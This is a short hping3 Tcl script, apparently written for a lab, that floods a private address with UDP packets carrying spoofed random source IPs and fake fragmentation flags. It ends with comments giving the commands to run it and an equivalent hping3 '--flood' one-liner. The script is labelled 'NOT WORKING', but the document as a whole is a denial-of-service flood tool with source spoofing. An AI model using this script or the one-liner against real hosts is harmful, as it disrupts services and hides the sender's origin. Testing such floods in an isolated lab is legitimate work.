# Hping3 UDP Fake Fragment Flood (no real fragmentation)
# NOT WORKING

set dst_ip "192.168.100.2"
set dst_port 50001
set count 0

proc random_ip {} {
    return "[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}].[expr {int(rand()*256)}]"
}

proc random_port {} {
    return [expr {int(rand()*64512) + 1024}]
}

while {1} {
    set saddr [random_ip]
    set sport [random_port]
    # fragoff=64, mf=1 ("More fragments" set), id random
    set frag_id [expr {int(rand()*65535)}]

    set pkt "ip(saddr=$saddr,daddr=$dst_ip,ttl=64,id=$frag_id,fragoff=64,mf=1)+udp(sport=$sport,dport=$dst_port)"

    hping send $pkt
    incr count

    if {[expr {$count % 1000}] == 0} {
        puts "$count UDP Fake-Fragment packets sent..."
    }
}

# Comandos:
# sudo hping3 exec udp_fake_frag.htcl
# sudo hping3 -2 192.168.100.2 -p 50001 -x -g 64 --flood